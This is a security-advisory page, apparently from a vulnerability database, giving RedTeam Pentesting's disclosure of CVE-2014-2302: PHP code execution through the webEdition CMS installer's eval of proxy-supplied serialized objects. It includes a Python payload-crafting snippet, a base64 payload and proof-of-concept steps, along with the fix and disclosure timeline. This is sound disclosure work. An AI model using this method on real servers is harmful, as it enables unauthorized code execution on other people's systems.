[RT-SA-2014-004] Remote Command Execution in webEdition CMS Installer Script
2014-06-14T00:00:00
ID SECURITYVULNS:DOC:30854 Type securityvulns Reporter Securityvulns Modified 2014-06-14T00:00:00
Description
Advisory: Remote Command Execution in webEdition CMS Installer Script
RedTeam Pentesting discovered a remote command execution vulnerability
in the installer script of the webEdition CMS during a penetration test.
If the installer script is not manually removed after installation,
attackers cannot only reinstall webEdition, but also gain remote command
execution.
Details
Product: webEdition CMS
Affected Versions: webEdition OnlineInstaller 2.8.0.0,
probably earlier versions, too
Fixed Versions: webEdition 6.2.7-s1 - 6.3.8-s1
Vulnerability Type: Remote Command Execution
Security Risk: high
Vendor URL: http://www.webedition.org
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-004
Advisory Status: published
CVE: CVE-2014-2302
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2302
Introduction
"webEdition is a flexible CMS for companies of every size. It offers a
great amount of functionality and can be flexibly customized for
individual needs. It is ideally suited for users who want to operate
their website comfortably. Even the creation of custom web applications
is easily possible with webEdition."
(translated from the webEdition homepage)
More Details
The webEdition installation script is not deleted automatically at the
end of the installation, even though it contains code to delete itself.
While an attacker who finds this script could just destructively
reinstall webEdition, it is also possible to use it to gain command
execution unnoticed on an existing webEdition installation.
During installation, the installer first checks whether outgoing
connections can be established by sending the following HTTP request to
update.webedition.org:
GET /server/we/onlineInstallation.php?update_cmd=checkConnection&
HTTP/1.0
Host: update.webedition.org
The server at update.webedition.org replies with the following HTTP
response, which contains base64-encoded data (formatted and shortened):
HTTP/1.1 200 OK
Date: Mon, 24 Feb 2014 10:34:56 GMT
Server: Apache/2.X.XX
X-Powered-By: PHP/5.X.XX
Connection: close
Content-Type: text/html
By decoding the response body it can be seen that it contains a
serialized PHP object:
a:3:{s:4:"Type";s:8:"template";s:8:"Headline";s:30:"Online Installer
version check";s:7:"Content";s:398:"<div class="messageDiv">
You are currently [...]</a>.</div>";}
This PHP object is processed by the installation script based on its
"Type" value. One of the "Type" values accepted by the installation
script is "eval", leading to the execution of PHP code which can be
specified as the value of a field named "Code", that is also part of
the serialized object.
Using the Python library phpserialize, a PHP object can be crafted,
which executes the function phpinfo() when it is received by the
installation script:
The installer allows the usage of a proxy server, enabling attackers to
intercept and arbitrarily modify HTTP requests issued by the installer
and the corresponding responses by the host update.webedition.org. By
setting a proxy server to use during the installation process which
answers all requests with the base64-encoded serialized PHP object, the
previously created PHP code is loaded and evaluated by the installation
script, which leads to the execution of the attack payload. Due to the
proxy server being saved in the HTTP session used by the installation
script, execution of the code served by the proxy server can be
triggered by opening the following URL:
Use the OnlineInstaller at
http://www.example.com/OnlineInstaller/setup.php to configure webEdition
to use a system under your control as a proxy server. Configure the
proxy to deliver the following file contents for all HTTP requests:
The OnlineInstaller should be deleted or access to its URLs restricted.
Fix
Update to a version with the suffix -s1. Those versions are available as
updates for releases between 6.2.7 and 6.3.8. The newest, updated
version would therefore be 6.3.8-s1.
Note that the version check of webEdition might tell you that there is
no update available and that you are running Version "6.3.8 (6.3.8.0
Release, SVN-Revision 6985). It will still tell you that the newest
available version is "6.3.8-s1 (6.3.8.0 Release, SVN-Revision 6985)", so
you can use the "Update-Repetition" function to get the fix for this
vulnerability.
Also note that the update does not remove the OnlineInstaller, but
modifies the login dialogue to remove the OnlineInstaller instead. You
will need to open the login dialogue after installing the update to
actually delete the OnlineInstaller. To be on the safe side, check the
OnlineInstaller directory manually for any files that still need to be
removed.
Security Risk
Attackers can not only use the OnlineInstaller to destructively
reinstall webEdition, but can also run arbitrary code PHP code by
setting their own proxy server in the OnlineInstaller and inject content
that is used as a parameter for the PHP eval() function. Since this
attacker-supplied code is executed on the webEdition server with the
privileges of the web server, this is a high risk, especially because
the attack is not as easy to detect as a reinstallation of webEdition by
an attacker.
Timeline
2014-02-20 Vulnerability identified
2014-03-04 Customer approved disclosure to vendor
2014-03-06 CVE number requested and assigned
2014-03-07 Vendor notified
2014-03-10 Vendor acknowledges vulnerability
2014-05-20 Vendor announces fixed versions
2014-05-28 Advisory released
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.
{"id": "SECURITYVULNS:DOC:30854", "bulletinFamily": "software", "title": "[RT-SA-2014-004] Remote Command Execution in webEdition CMS Installer Script", "description": "\r\n\r\nAdvisory: Remote Command Execution in webEdition CMS Installer Script\r\n\r\nRedTeam Pentesting discovered a remote command execution vulnerability\r\nin the installer script of the webEdition CMS during a penetration test.\r\nIf the installer script is not manually removed after installation,\r\nattackers cannot only reinstall webEdition, but also gain remote command\r\nexecution.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: webEdition CMS\r\nAffected Versions: webEdition OnlineInstaller 2.8.0.0,\r\n probably earlier versions, too\r\nFixed Versions: webEdition 6.2.7-s1 - 6.3.8-s1\r\nVulnerability Type: Remote Command Execution\r\nSecurity Risk: high\r\nVendor URL: http://www.webedition.org\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-004\r\nAdvisory Status: published\r\nCVE: CVE-2014-2302\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2302\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n"webEdition is a flexible CMS for companies of every size. It offers a\r\ngreat amount of functionality and can be flexibly customized for\r\nindividual needs. It is ideally suited for users who want to operate\r\ntheir website comfortably. Even the creation of custom web applications\r\nis easily possible with webEdition."\r\n\r\n(translated from the webEdition homepage)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe webEdition installation script is not deleted automatically at the\r\nend of the installation, even though it contains code to delete itself.\r\nWhile an attacker who finds this script could just destructively\r\nreinstall webEdition, it is also possible to use it to gain command\r\nexecution unnoticed on an existing webEdition installation.\r\n\r\nDuring installation, the installer first checks whether outgoing\r\nconnections can be established by sending the following HTTP request to\r\nupdate.webedition.org:\r\n\r\nGET /server/we/onlineInstallation.php?update_cmd=checkConnection&\r\n HTTP/1.0\r\nHost: update.webedition.org\r\n\r\nThe server at update.webedition.org replies with the following HTTP\r\nresponse, which contains base64-encoded data (formatted and shortened):\r\n\r\nHTTP/1.1 200 OK\r\nDate: Mon, 24 Feb 2014 10:34:56 GMT\r\nServer: Apache/2.X.XX\r\nX-Powered-By: PHP/5.X.XX\r\nConnection: close\r\nContent-Type: text/html\r\n\r\nYTozOntzOjQ6IlR5cGUiO3M6ODoidGVtcGxhdGUiO3M6ODoiSGVhZGxpbmUiO3M6MzA6Ik9u\r\nbGluZSBJbnN0YWxsZXIgdmVyc2lvbiBjaGVjayI7czo3OiJDb250ZW50IjtzOjM5ODoiCjxk\r\naXYgY2xhc3M9Im1lc3NhZ2VEaXYiPgpZb3UgYXJlIGN1cnJlbnRseSB1c2luZyBhbiBvbGQg\r\n[...]\r\n\r\nBy decoding the response body it can be seen that it contains a\r\nserialized PHP object:\r\n\r\na:3:{s:4:"Type";s:8:"template";s:8:"Headline";s:30:"Online Installer\r\nversion check";s:7:"Content";s:398:"<div class="messageDiv">\r\nYou are currently [...]</a>.</div>";}\r\n\r\nThis PHP object is processed by the installation script based on its\r\n"Type" value. One of the "Type" values accepted by the installation\r\nscript is "eval", leading to the execution of PHP code which can be\r\nspecified as the value of a field named "Code", that is also part of\r\nthe serialized object.\r\n\r\nUsing the Python library phpserialize, a PHP object can be crafted,\r\nwhich executes the function phpinfo() when it is received by the\r\ninstallation script:\r\n\r\n$ python\r\n>>> from phpserialize import dumps\r\n>>> object = dumps({"Type": "eval", "Code": "<?php phpinfo();?>"})\r\n>>> object.encode("base64")\r\n'YToyOntzOjQ6IkNvZGUiO3M6MTg6Ijw/cGhwIHBocGluZm8oKTs/PiI7czo0OiJUeXBlIjtz\r\nOjQ6\nImV2YWwiO30=\n'\r\n\r\nThe installer allows the usage of a proxy server, enabling attackers to\r\nintercept and arbitrarily modify HTTP requests issued by the installer\r\nand the corresponding responses by the host update.webedition.org. By\r\nsetting a proxy server to use during the installation process which\r\nanswers all requests with the base64-encoded serialized PHP object, the\r\npreviously created PHP code is loaded and evaluated by the installation\r\nscript, which leads to the execution of the attack payload. Due to the\r\nproxy server being saved in the HTTP session used by the installation\r\nscript, execution of the code served by the proxy server can be\r\ntriggered by opening the following URL:\r\n\r\nhttp://www.example.com/OnlineInstaller/setup.php?\r\n &leWizard=DownloadInstaller\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nUse the OnlineInstaller at\r\nhttp://www.example.com/OnlineInstaller/setup.php to configure webEdition\r\nto use a system under your control as a proxy server. Configure the\r\nproxy to deliver the following file contents for all HTTP requests:\r\n\r\nYToyOntzOjQ6IkNvZGUiO3M6MTg6Ijw/cGhwIHBocGluZm8oKTs/PiI7czo0OiJUeXBlIjt\r\nzOjQ6ImV2YWwiO30=\r\n\r\nReopen the following URL:\r\n\r\nhttp://www.example.com/OnlineInstaller/setup.php?\r\n &leWizard=DownloadInstaller\r\n\r\nAfter a redirect, phpinfo() output will be shown.\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nThe OnlineInstaller should be deleted or access to its URLs restricted.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to a version with the suffix -s1. Those versions are available as\r\nupdates for releases between 6.2.7 and 6.3.8. The newest, updated\r\nversion would therefore be 6.3.8-s1.\r\n\r\nNote that the version check of webEdition might tell you that there is\r\nno update available and that you are running Version "6.3.8 (6.3.8.0\r\nRelease, SVN-Revision 6985). It will still tell you that the newest\r\navailable version is "6.3.8-s1 (6.3.8.0 Release, SVN-Revision 6985)", so\r\nyou can use the "Update-Repetition" function to get the fix for this\r\nvulnerability.\r\n\r\nAlso note that the update does not remove the OnlineInstaller, but\r\nmodifies the login dialogue to remove the OnlineInstaller instead. You\r\nwill need to open the login dialogue after installing the update to\r\nactually delete the OnlineInstaller. To be on the safe side, check the\r\nOnlineInstaller directory manually for any files that still need to be\r\nremoved.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nAttackers can not only use the OnlineInstaller to destructively\r\nreinstall webEdition, but can also run arbitrary code PHP code by\r\nsetting their own proxy server in the OnlineInstaller and inject content\r\nthat is used as a parameter for the PHP eval() function. Since this\r\nattacker-supplied code is executed on the webEdition server with the\r\nprivileges of the web server, this is a high risk, especially because\r\nthe attack is not as easy to detect as a reinstallation of webEdition by\r\nan attacker.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-02-20 Vulnerability identified\r\n2014-03-04 Customer approved disclosure to vendor\r\n2014-03-06 CVE number requested and assigned\r\n2014-03-07 Vendor notified\r\n2014-03-10 Vendor acknowledges vulnerability\r\n2014-05-20 Vendor announces fixed versions\r\n2014-05-28 Advisory released\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://www.webedition.org/de/aktuelles/webedition-cms/\r\n Wichtiges-Sicherheitsupdate-fuer-CMS-webEdition-veroeffentlicht\r\n (German)\r\nhttp://www.webedition.org/de/aktuelles/webedition-cms/\r\n Wichtige-Hinweise-zum-Sicherheitsupdate (German)\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttps://www.redteam-pentesting.de.\r\n\r\n-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschaftsfuhrer: Patrick Hof, Jens Liebchen\r\n\r\n", "published": "2014-06-14T00:00:00", "modified": "2014-06-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30854", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2014-2302"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:52", "edition": 1, "viewCount": 14, "enchantments": {"score": {"value": 7.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2302"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126861"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13836"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2014-2302"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126861"]}]}, "exploitation": null, "vulnersScore": 7.6}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647552764}}
{"packetstorm": [{"lastseen": "2016-12-05T22:21:46", "description": "", "published": "2014-05-30T00:00:00", "type": "packetstorm", "title": "webEdition CMS 2.8.0.0 Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2302"], "modified": "2014-05-30T00:00:00", "id": "PACKETSTORM:126861", "href": "https://packetstormsecurity.com/files/126861/webEdition-CMS-2.8.0.0-Remote-Command-Execution.html", "sourceData": "`Advisory: Remote Command Execution in webEdition CMS Installer Script \n \nRedTeam Pentesting discovered a remote command execution vulnerability \nin the installer script of the webEdition CMS during a penetration test. \nIf the installer script is not manually removed after installation, \nattackers cannot only reinstall webEdition, but also gain remote command \nexecution. \n \n \nDetails \n======= \n \nProduct: webEdition CMS \nAffected Versions: webEdition OnlineInstaller 2.8.0.0, \nprobably earlier versions, too \nFixed Versions: webEdition 6.2.7-s1 - 6.3.8-s1 \nVulnerability Type: Remote Command Execution \nSecurity Risk: high \nVendor URL: http://www.webedition.org \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-004 \nAdvisory Status: published \nCVE: CVE-2014-2302 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2302 \n \n \nIntroduction \n============ \n \n\"webEdition is a flexible CMS for companies of every size. It offers a \ngreat amount of functionality and can be flexibly customized for \nindividual needs. It is ideally suited for users who want to operate \ntheir website comfortably. Even the creation of custom web applications \nis easily possible with webEdition.\" \n \n(translated from the webEdition homepage) \n \n \nMore Details \n============ \n \nThe webEdition installation script is not deleted automatically at the \nend of the installation, even though it contains code to delete itself. \nWhile an attacker who finds this script could just destructively \nreinstall webEdition, it is also possible to use it to gain command \nexecution unnoticed on an existing webEdition installation. \n \nDuring installation, the installer first checks whether outgoing \nconnections can be established by sending the following HTTP request to \nupdate.webedition.org: \n \nGET /server/we/onlineInstallation.php?update_cmd=checkConnection& \nHTTP/1.0 \nHost: update.webedition.org \n \nThe server at update.webedition.org replies with the following HTTP \nresponse, which contains base64-encoded data (formatted and shortened): \n \nHTTP/1.1 200 OK \nDate: Mon, 24 Feb 2014 10:34:56 GMT \nServer: Apache/2.X.XX \nX-Powered-By: PHP/5.X.XX \nConnection: close \nContent-Type: text/html \n \nYTozOntzOjQ6IlR5cGUiO3M6ODoidGVtcGxhdGUiO3M6ODoiSGVhZGxpbmUiO3M6MzA6Ik9u \nbGluZSBJbnN0YWxsZXIgdmVyc2lvbiBjaGVjayI7czo3OiJDb250ZW50IjtzOjM5ODoiCjxk \naXYgY2xhc3M9Im1lc3NhZ2VEaXYiPgpZb3UgYXJlIGN1cnJlbnRseSB1c2luZyBhbiBvbGQg \n[...] \n \nBy decoding the response body it can be seen that it contains a \nserialized PHP object: \n \na:3:{s:4:\"Type\";s:8:\"template\";s:8:\"Headline\";s:30:\"Online Installer \nversion check\";s:7:\"Content\";s:398:\"<div class=\"messageDiv\"> \nYou are currently [...]</a>.</div>\";} \n \nThis PHP object is processed by the installation script based on its \n\"Type\" value. One of the \"Type\" values accepted by the installation \nscript is \"eval\", leading to the execution of PHP code which can be \nspecified as the value of a field named \"Code\", that is also part of \nthe serialized object. \n \nUsing the Python library phpserialize, a PHP object can be crafted, \nwhich executes the function phpinfo() when it is received by the \ninstallation script: \n \n$ python \n>>> from phpserialize import dumps \n>>> object = dumps({\"Type\": \"eval\", \"Code\": \"<?php phpinfo();?>\"}) \n>>> object.encode(\"base64\") \n'YToyOntzOjQ6IkNvZGUiO3M6MTg6Ijw/cGhwIHBocGluZm8oKTs/PiI7czo0OiJUeXBlIjtz \nOjQ6\\nImV2YWwiO30=\\n' \n \nThe installer allows the usage of a proxy server, enabling attackers to \nintercept and arbitrarily modify HTTP requests issued by the installer \nand the corresponding responses by the host update.webedition.org. By \nsetting a proxy server to use during the installation process which \nanswers all requests with the base64-encoded serialized PHP object, the \npreviously created PHP code is loaded and evaluated by the installation \nscript, which leads to the execution of the attack payload. Due to the \nproxy server being saved in the HTTP session used by the installation \nscript, execution of the code served by the proxy server can be \ntriggered by opening the following URL: \n \nhttp://www.example.com/OnlineInstaller/setup.php? \n&leWizard=DownloadInstaller \n \n \nProof of Concept \n================ \n \nUse the OnlineInstaller at \nhttp://www.example.com/OnlineInstaller/setup.php to configure webEdition \nto use a system under your control as a proxy server. Configure the \nproxy to deliver the following file contents for all HTTP requests: \n \nYToyOntzOjQ6IkNvZGUiO3M6MTg6Ijw/cGhwIHBocGluZm8oKTs/PiI7czo0OiJUeXBlIjt \nzOjQ6ImV2YWwiO30= \n \nReopen the following URL: \n \nhttp://www.example.com/OnlineInstaller/setup.php? \n&leWizard=DownloadInstaller \n \nAfter a redirect, phpinfo() output will be shown. \n \n \nWorkaround \n========== \n \nThe OnlineInstaller should be deleted or access to its URLs restricted. \n \n \nFix \n=== \n \nUpdate to a version with the suffix -s1. Those versions are available as \nupdates for releases between 6.2.7 and 6.3.8. The newest, updated \nversion would therefore be 6.3.8-s1. \n \nNote that the version check of webEdition might tell you that there is \nno update available and that you are running Version \"6.3.8 (6.3.8.0 \nRelease, SVN-Revision 6985). It will still tell you that the newest \navailable version is \"6.3.8-s1 (6.3.8.0 Release, SVN-Revision 6985)\", so \nyou can use the \"Update-Repetition\" function to get the fix for this \nvulnerability. \n \nAlso note that the update does not remove the OnlineInstaller, but \nmodifies the login dialogue to remove the OnlineInstaller instead. You \nwill need to open the login dialogue after installing the update to \nactually delete the OnlineInstaller. To be on the safe side, check the \nOnlineInstaller directory manually for any files that still need to be \nremoved. \n \n \nSecurity Risk \n============= \n \nAttackers can not only use the OnlineInstaller to destructively \nreinstall webEdition, but can also run arbitrary code PHP code by \nsetting their own proxy server in the OnlineInstaller and inject content \nthat is used as a parameter for the PHP eval() function. Since this \nattacker-supplied code is executed on the webEdition server with the \nprivileges of the web server, this is a high risk, especially because \nthe attack is not as easy to detect as a reinstallation of webEdition by \nan attacker. \n \n \nTimeline \n======== \n \n2014-02-20 Vulnerability identified \n2014-03-04 Customer approved disclosure to vendor \n2014-03-06 CVE number requested and assigned \n2014-03-07 Vendor notified \n2014-03-10 Vendor acknowledges vulnerability \n2014-05-20 Vendor announces fixed versions \n2014-05-28 Advisory released \n \n \nReferences \n========== \n \nhttp://www.webedition.org/de/aktuelles/webedition-cms/ \nWichtiges-Sicherheitsupdate-fuer-CMS-webEdition-veroeffentlicht \n(German) \nhttp://www.webedition.org/de/aktuelles/webedition-cms/ \nWichtige-Hinweise-zum-Sicherheitsupdate (German) \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests, short pentests, \nperformed by a team of specialised IT-security experts. Hereby, security \nweaknesses in company networks or products are uncovered and can be \nfixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at \nhttps://www.redteam-pentesting.de. \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/126861/rt-sa-2014-004.txt"}], "cve": [{"lastseen": "2022-03-23T12:34:46", "description": "The installer script in webEdition CMS before 6.2.7-s1 and 6.3.x before 6.3.8-s1 allows remote attackers to conduct PHP Object Injection attacks by intercepting a request to update.webedition.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-19T17:29:00", "type": "cve", "title": "CVE-2014-2302", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2302"], "modified": "2018-09-18T14:45:00", "cpe": ["cpe:/a:webedition:webedition_cms:6.2.7.0", "cpe:/a:webedition:webedition_cms:6.3.8"], "id": "CVE-2014-2302", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2302", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:webedition:webedition_cms:6.3.8:s1:*:*:*:*:*:*", "cpe:2.3:a:webedition:webedition_cms:6.2.7.0:s1:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2021-06-08T18:45:19", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-06-14T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-3946", "CVE-2014-3781", "CVE-2014-2575", "CVE-2014-3945", "CVE-2014-2987", "CVE-2014-2303", "CVE-2014-3414", "CVE-2014-3947", "CVE-2014-2554", "CVE-2014-3948", "CVE-2014-3944", "CVE-2014-3137", "CVE-2014-3740", "CVE-2013-2251", "CVE-2014-3877", "CVE-2014-3446", "CVE-2014-3943", "CVE-2014-3941", "CVE-2014-3210", "CVE-2014-1402", "CVE-2014-0228", "CVE-2014-3415", "CVE-2014-0130", "CVE-2014-2577", "CVE-2014-3875", "CVE-2014-3942", "CVE-2014-3783", "CVE-2013-7106", "CVE-2014-2233", "CVE-2014-2843", "CVE-2014-3447", "CVE-2013-7107", "CVE-2014-3749", "CVE-2014-0081", "CVE-2014-2232", "CVE-2014-1855", "CVE-2014-1878", "CVE-2014-2302", "CVE-2014-0082", "CVE-2014-3876", "CVE-2014-2553", "CVE-2014-3782", "CVE-2014-2386", "CVE-2014-3966", "CVE-2013-5954", "CVE-2014-0107", "CVE-2014-3448", "CVE-2013-7108", "CVE-2014-2988", "CVE-2014-3445", "CVE-2014-3949"], "modified": "2014-06-14T00:00:00", "id": "SECURITYVULNS:VULN:13836", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13836", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
